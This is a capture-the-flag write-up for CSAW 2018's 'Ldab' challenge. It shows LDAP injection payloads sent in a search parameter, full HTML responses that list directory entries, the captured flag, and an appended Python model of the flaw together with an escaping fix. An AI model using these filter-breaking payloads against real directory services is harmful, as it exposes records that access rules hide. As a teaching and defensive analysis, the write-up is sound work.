Tags: ldap web 

# ▼▼▼Ldab(Web:50、432/1448=29.8%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
dab

http://web.chal.csaw.io:8080
```

---

## 【Identify the vulnerability】

```
GET /index.php HTTP/1.1
Host: web.chal.csaw.io:8080
```

![](http://raw.githubusercontent.com/kazkiti/CTF-image/master/CSAW2018_top.png)

`OU CN SN GivenName UID`

Since these column headers are LDAP attribute names, the application appears to be querying an LDAP directory.

---

```
GET /index.php?search=*)(ObjectClass=* HTTP/1.1
Host: web.chal.csaw.io:8080
```

```
<html>
<head> <title>Any Comp. Directory </title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.input-mysize{
width:791px;
}
.table {
background-color:white;
border-style: solid;
border-width: 2px;
right-margin: 50px;
width:1000px;
}
</style>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="containter-fluid">
<div class="navbar-header">
Any Comp. Directory
</div>
</div>


</nav>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1 text-center">

Here is a list of all users and groups


</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-2">
<form role="search" action="index.php">
<div class="form-group" >
<input type="text" class="form-control input-mysize" placeholder="Search" name="search">
<button type="submit" class="btn btn-default"> Search</button>
</div>
</form>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

<tr>
<th> OU </th> <th> CN </th> <th> SN </th> <th> GivenName </th> <th> UID </th>
</tr>
<tr><td></td><td></td><td></td><td></td><td></td></tr><tr><td>Employees</td><td>pminksy</td><td>Minsky</td><td>Pete</td><td>pminsky</td></tr><tr><td>Employees</td><td>bharley</td><td>Harley</td><td>Bob</td><td>bharley</td></tr><tr><td>Employees</td><td>jross</td><td>Ross</td><td>Jake</td><td>jross</td></tr><tr><td>Employees</td><td>fdawson</td><td>Dawson</td><td>Fred</td><td>fdawson</td></tr><tr><td>Employees</td><td>rcave</td><td>Cave</td><td>Robert</td><td>rcave</td></tr><tr><td>Employees</td><td>XerxesHansen</td><td>Hansen</td><td>Xerxes</td><td>XerxesHansen</td></tr><tr><td>Employees</td><td>KirbyDaugherty</td><td>Daugherty</td><td>Kirby</td><td>KirbyDaugherty</td></tr><tr><td>Employees</td><td>DesiraeLowe</td><td>Lowe</td><td>Desirae</td><td>DesiraeLowe</td></tr><tr><td>Employees</td><td>BelleCarter</td><td>Carter</td><td>Belle</td><td>BelleCarter</td></tr><tr><td>Employees</td><td>FeliciaHines</td><td>Hines</td><td>Felicia</td><td>FeliciaHines</td></tr><tr><td>Employees</td><td>SopolineGilbert</td><td>Gilbert</td><td>Sopoline</td><td>SopolineGilbert</td></tr><tr><td>Employees</td><td>WesleyBranch</td><td>Branch</td><td>Wesley</td><td>WesleyBranch</td></tr><tr><td>Employees</td><td>IraMorton</td><td>Morton</td><td>Ira</td><td>IraMorton</td></tr><tr><td>Employees</td><td>HirokoBarber</td><td>Barber</td><td>Hiroko</td><td>HirokoBarber</td></tr><tr><td>Employees</td><td>BlairBeasley</td><td>Beasley</td><td>Blair</td><td>BlairBeasley</td></tr><tr><td>Employees</td><td>ThomasHernandez</td><td>Hernandez</td><td>Thomas</td><td>ThomasHernandez</td></tr><tr><td>Employees</td><td>StellaBurch</td><td>Burch</td><td>Stella</td><td>StellaBurch</td></tr><tr><td>Employees</td><td>StephenRowland</td><td>Rowland</td><td>Stephen</td><td>StephenRowland</td></tr><tr><td>Employees</td><td>DonovanShepherd</td><td>Shepherd</td><td>Donovan</td><td>DonovanShepherd</td></tr><tr><td>Employees</td><td>SilasWard</td><td>Ward</td><td>Silas</td><td>SilasWard</td></tr><tr><td>Employees</td><td>RandallPittman</td><td>Pittman</td><td>Randall</td><td>RandallPittman</td></tr><tr><td>Employees</td><td>MaxwellPaul</td><td>Paul</td><td>Maxwell</td><td>MaxwellPaul</td></tr><tr><td>Employees</td><td>BenedictCunningham</td><td>Cunningham</td><td>Benedict</td><td>BenedictCunningham</td></tr><tr><td>Employees</td><td>JessamineRobinson</td><td>Robinson</td><td>Jessamine</td><td>JessamineRobinson</td></tr><tr><td>Employees</td><td>GarrettMcintyre</td><td>Mcintyre</td><td>Garrett</td><td>GarrettMcintyre</td></tr><tr><td>Employees</td><td>TalonLevy</td><td>Levy</td><td>Talon</td><td>TalonLevy</td></tr><tr><td>Employees</td><td>UptonJohnson</td><td>Johnson</td><td>Upton</td><td>UptonJohnson</td></tr><tr><td>Employees</td><td>DeannaRoss</td><td>Ross</td><td>Deanna</td><td>DeannaRoss</td></tr><tr><td>Employees</td><td>XanthaHunter</td><td>Hunter</td><td>Xantha</td><td>XanthaHunter</td></tr><tr><td>Employees</td><td>GermaneKent</td><td>Kent</td><td>Germane</td><td>GermaneKent</td></tr><tr><td>Employees</td><td>PhoebeClements</td><td>Clements</td><td>Phoebe</td><td>PhoebeClements</td></tr><tr><td>Employees</td><td>MurphyBuck</td><td>Buck</td><td>Murphy</td><td>MurphyBuck</td></tr><tr><td>Employees</td><td>KeelyDowns</td><td>Downs</td><td>Keely</td><td>KeelyDowns</td></tr><tr><td>Employees</td><td>LeeCarlson</td><td>Carlson</td><td>Lee</td><td>LeeCarlson</td></tr><tr><td>Employees</td><td>BrentBarlow</td><td>Barlow</td><td>Brent</td><td>BrentBarlow</td></tr><tr><td>Employees</td><td>MaiaMcneil</td><td>Mcneil</td><td>Maia</td><td>MaiaMcneil</td></tr><tr><td>Employees</td><td>QuinnHaney</td><td>Haney</td><td>Quinn</td><td>QuinnHaney</td></tr><tr><td>Employees</td><td>JenettePacheco</td><td>Pacheco</td><td>Jenette</td><td>JenettePacheco</td></tr> </table>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

</table>
</div>
</div>
</div>
</body>
</html>
```

Every entry in the directory is returned, so the `search` value is being concatenated into the LDAP filter without escaping: an `LDAP injection` vulnerability exists!!

---

## 【LDAP formula guess】

I guessed that the server adds an extra condition to the filter, either before or after the search term, and that this condition is what keeps the flag entry out of the results.

```
(&(GivenName=" + $_GET['search'] + ")(▲▲▲!=●●●))
```

or

```
(&(▲▲▲!=●●●)(GivenName=" + $_GET['search'] + "))
```

---

## 【exploit】

```
GET /index.php?search=*))(|(ObjectClass=* HTTP/1.1
Host: web.chal.csaw.io:8080
```

```
<html>
<head> <title>Any Comp. Directory </title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.input-mysize{
width:791px;
}
.table {
background-color:white;
border-style: solid;
border-width: 2px;
right-margin: 50px;
width:1000px;
}
</style>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="containter-fluid">
<div class="navbar-header">
Any Comp. Directory
</div>
</div>


</nav>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1 text-center">

Here is a list of all users and groups


</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-2">
<form role="search" action="index.php">
<div class="form-group" >
<input type="text" class="form-control input-mysize" placeholder="Search" name="search">
<button type="submit" class="btn btn-default"> Search</button>
</div>
</form>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

<tr>
<th> OU </th> <th> CN </th> <th> SN </th> <th> GivenName </th> <th> UID </th>
</tr>
<tr><td></td><td></td><td></td><td></td><td></td></tr><tr><td>Employees</td><td>pminksy</td><td>Minsky</td><td>Pete</td><td>pminsky</td></tr><tr><td>Employees</td><td>bharley</td><td>Harley</td><td>Bob</td><td>bharley</td></tr><tr><td>Employees</td><td>jross</td><td>Ross</td><td>Jake</td><td>jross</td></tr><tr><td>Employees</td><td>fdawson</td><td>Dawson</td><td>Fred</td><td>fdawson</td></tr><tr><td>Employees</td><td>rcave</td><td>Cave</td><td>Robert</td><td>rcave</td></tr><tr><td>Employees</td><td>XerxesHansen</td><td>Hansen</td><td>Xerxes</td><td>XerxesHansen</td></tr><tr><td>Employees</td><td>KirbyDaugherty</td><td>Daugherty</td><td>Kirby</td><td>KirbyDaugherty</td></tr><tr><td>Employees</td><td>DesiraeLowe</td><td>Lowe</td><td>Desirae</td><td>DesiraeLowe</td></tr><tr><td>Employees</td><td>BelleCarter</td><td>Carter</td><td>Belle</td><td>BelleCarter</td></tr><tr><td>Employees</td><td>FeliciaHines</td><td>Hines</td><td>Felicia</td><td>FeliciaHines</td></tr><tr><td>Employees</td><td>SopolineGilbert</td><td>Gilbert</td><td>Sopoline</td><td>SopolineGilbert</td></tr><tr><td>Employees</td><td>WesleyBranch</td><td>Branch</td><td>Wesley</td><td>WesleyBranch</td></tr><tr><td>Employees</td><td>IraMorton</td><td>Morton</td><td>Ira</td><td>IraMorton</td></tr><tr><td>Employees</td><td>HirokoBarber</td><td>Barber</td><td>Hiroko</td><td>HirokoBarber</td></tr><tr><td>Employees</td><td>BlairBeasley</td><td>Beasley</td><td>Blair</td><td>BlairBeasley</td></tr><tr><td>Employees</td><td>ThomasHernandez</td><td>Hernandez</td><td>Thomas</td><td>ThomasHernandez</td></tr><tr><td>Employees</td><td>StellaBurch</td><td>Burch</td><td>Stella</td><td>StellaBurch</td></tr><tr><td>Employees</td><td>StephenRowland</td><td>Rowland</td><td>Stephen</td><td>StephenRowland</td></tr><tr><td>Employees</td><td>DonovanShepherd</td><td>Shepherd</td><td>Donovan</td><td>DonovanShepherd</td></tr><tr><td>Employees</td><td>SilasWard</td><td>Ward</td><td>Silas</td><td>SilasWard</td></tr><tr><td>Employees</td><td>RandallPittman</td><td>Pittman</td><td>Randall</td><td>RandallPittman</td></tr><tr><td>Employees</td><td>MaxwellPaul</td><td>Paul</td><td>Maxwell</td><td>MaxwellPaul</td></tr><tr><td>Employees</td><td>BenedictCunningham</td><td>Cunningham</td><td>Benedict</td><td>BenedictCunningham</td></tr><tr><td>Employees</td><td>JessamineRobinson</td><td>Robinson</td><td>Jessamine</td><td>JessamineRobinson</td></tr><tr><td>Employees</td><td>GarrettMcintyre</td><td>Mcintyre</td><td>Garrett</td><td>GarrettMcintyre</td></tr><tr><td>Employees</td><td>TalonLevy</td><td>Levy</td><td>Talon</td><td>TalonLevy</td></tr><tr><td>Employees</td><td>UptonJohnson</td><td>Johnson</td><td>Upton</td><td>UptonJohnson</td></tr><tr><td>Employees</td><td>DeannaRoss</td><td>Ross</td><td>Deanna</td><td>DeannaRoss</td></tr><tr><td>Employees</td><td>XanthaHunter</td><td>Hunter</td><td>Xantha</td><td>XanthaHunter</td></tr><tr><td>Employees</td><td>GermaneKent</td><td>Kent</td><td>Germane</td><td>GermaneKent</td></tr><tr><td>Employees</td><td>PhoebeClements</td><td>Clements</td><td>Phoebe</td><td>PhoebeClements</td></tr><tr><td>Employees</td><td>MurphyBuck</td><td>Buck</td><td>Murphy</td><td>MurphyBuck</td></tr><tr><td>Employees</td><td>KeelyDowns</td><td>Downs</td><td>Keely</td><td>KeelyDowns</td></tr><tr><td>Employees</td><td>LeeCarlson</td><td>Carlson</td><td>Lee</td><td>LeeCarlson</td></tr><tr><td>Employees</td><td>BrentBarlow</td><td>Barlow</td><td>Brent</td><td>BrentBarlow</td></tr><tr><td>Employees</td><td>MaiaMcneil</td><td>Mcneil</td><td>Maia</td><td>MaiaMcneil</td></tr><tr><td>Employees</td><td>QuinnHaney</td><td>Haney</td><td>Quinn</td><td>QuinnHaney</td></tr><tr><td>Employees</td><td>JenettePacheco</td><td>Pacheco</td><td>Jenette</td><td>JenettePacheco</td></tr><tr><td>Employees</td><td>flag{ld4p_inj3ction_i5_a_th1ng}</td><td>Man</td><td>Flag</td><td>fman</td></tr> </table>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

</table>
</div>
</div>
</div>
</body>
</html>
```

`flag{ld4p_inj3ction_i5_a_th1ng}`
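The following is an added example written for this editing pass; it is not code from the challenge or from the writeup's author. It models the first guessed filter shape, `(&(GivenName=<search>)(<hidden clause>))`, against a small in-memory directory and shows why the `*)(ObjectClass=*` probe lists every employee but not the flag, why `*))(|(ObjectClass=*` also returns the flag entry, and why RFC 4515 escaping of the user value removes both behaviours. Three things are assumptions made for the example, not facts from the page: the hidden clause is modelled as `(!(uid=fman))` in place of the writeup's `(▲▲▲!=●●●)`; the directory entries are constructed from a few rows of the response plus the flag row; and the server is modelled as using only the first complete filter and ignoring trailing text, which is consistent with the flag row appearing for the second payload.

```python
"""Model of the injectable filter from the writeup, plus a hardened builder.

Assumptions (example only): the hidden clause is (!(uid=fman)); the directory
is constructed; only the first complete filter is used, trailing text ignored.
"""
import re

# Constructed directory: three employee rows from the page and the flag entry.
DIRECTORY = [
    {"ou": "Employees", "cn": "pminksy", "sn": "Minsky", "givenname": "Pete", "uid": "pminsky"},
    {"ou": "Employees", "cn": "bharley", "sn": "Harley", "givenname": "Bob", "uid": "bharley"},
    {"ou": "Employees", "cn": "jross", "sn": "Ross", "givenname": "Jake", "uid": "jross"},
    {"ou": "Employees", "cn": "flag{ld4p_inj3ction_i5_a_th1ng}", "sn": "Man", "givenname": "Flag", "uid": "fman"},
]
for _entry in DIRECTORY:
    _entry["objectclass"] = "person"  # every entry has one, so (ObjectClass=*) matches all

HIDE_FLAG = "(!(uid=fman))"  # assumed stand-in for the writeup's (▲▲▲!=●●●)


def build_filter_vulnerable(search):
    """Filter shape #1 from the writeup: raw concatenation of the search value."""
    return "(&(GivenName=" + search + ")" + HIDE_FLAG + ")"


# RFC 4515 escaping: the only characters that can change filter structure.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_safe(search):
    """Same filter shape, but the user value can no longer open or close clauses."""
    return "(&(GivenName=" + escape_filter_value(search) + ")" + HIDE_FLAG + ")"


def parse_filter(text, pos=0):
    """Parse one RFC 4515 filter at text[pos]; return (node, end_pos).

    Nodes: ("&", [children]), ("|", [children]), ("!", [child]) or
    ("=", attribute, value). Text after end_pos is left unconsumed.
    """
    if pos >= len(text) or text[pos] != "(":
        raise ValueError("expected '(' at offset %d" % pos)
    pos += 1
    if pos >= len(text):
        raise ValueError("truncated filter")
    op = text[pos]
    if op in "&|":
        pos += 1
        children = []
        while pos < len(text) and text[pos] == "(":
            child, pos = parse_filter(text, pos)
            children.append(child)
        node = (op, children)
    elif op == "!":
        child, pos = parse_filter(text, pos + 1)
        node = ("!", [child])
    else:
        end = text.index(")", pos)
        attr, _, value = text[pos:end].partition("=")
        node = ("=", attr.lower(), value)
        pos = end
    if pos >= len(text) or text[pos] != ")":
        raise ValueError("expected ')' at offset %d" % pos)
    return node, pos + 1


def _unescape(part):
    """Turn \\XX hex escapes back into the literal character they encode."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), part)


def _value_matches(pattern, actual):
    """An unescaped '*' is a wildcard; an escaped \\2a is a literal asterisk."""
    regex = ".*".join(re.escape(_unescape(p)) for p in pattern.split("*"))
    return re.fullmatch(regex, actual, re.IGNORECASE) is not None


def evaluate(node, entry):
    if node[0] == "&":
        return all(evaluate(c, entry) for c in node[1])
    if node[0] == "|":
        return any(evaluate(c, entry) for c in node[1])
    if node[0] == "!":
        return not evaluate(node[1][0], entry)
    _, attr, value = node
    return attr in entry and _value_matches(value, entry[attr])


def search(filter_text):
    """uids matched by the FIRST complete filter; trailing text is ignored (assumption)."""
    node, _end = parse_filter(filter_text)
    return [e["uid"] for e in DIRECTORY if evaluate(node, e)]


if __name__ == "__main__":
    for payload in ["*)(ObjectClass=*", "*))(|(ObjectClass=*", "Flag"]:
        print("vulnerable:", build_filter_vulnerable(payload), "->", search(build_filter_vulnerable(payload)))
        print("hardened:  ", build_filter_safe(payload), "->", search(build_filter_safe(payload)))
```

With the vulnerable builder, the second payload yields `(&(GivenName=*))(|(ObjectClass=*)(!(uid=fman)))`: the first complete filter is just `(&(GivenName=*))`, and the hidden exclusion ends up in the ignored tail, which is exactly the effect the exploit section relies on. With `escape_filter_value` applied, the same payload becomes a literal `GivenName` value that matches nobody, and a search for `Flag` still returns nothing because the exclusion clause stays attached.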